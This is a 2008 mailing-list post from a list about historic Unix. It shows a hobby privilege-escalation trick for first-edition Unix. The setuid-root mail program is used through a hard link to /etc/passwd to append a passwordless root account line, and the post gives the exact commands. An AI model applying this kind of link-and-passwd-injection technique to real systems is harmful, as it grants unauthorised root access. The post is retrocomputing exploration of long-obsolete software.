[Unix-jun72] Some fun with 1st ed

Tim Newsham newsham at lava.net
Sun May 4 05:20:13 AEST 2008

All work and no play...

Here's a fun hack for first edition unix.  From MAIL (I) :

   When followed by the names of a letter and one or more people, the
   letter is appended to each person's mailbox.  Each letter is
   preceded by the sender's name and a postmark.

   A person is either the nameof an entry in the directory /usr, in
   which case the mail is sent to /usr/person/mailbox, or the path
   of a directory, in which case mailbox in that directory is used.

Mail is setuid root:

# ls -l /bin/mail
  80 surwr-  1 root   3940 Jan  1 00:00:00 mail

login as a non-root user (ie "bin"), create a file "letter" with the 
contents "hack::0:/:".  Run:

    @ ln /etc/passwd /tmp/mailbox
    @ mail letter /tmp

log out and log back in as "hack".  You are now root.  Cat /etc/passwd
and notice:

   From bin Jan  1 00:49:22

clean up the file a little and enjoy your new elevated status.

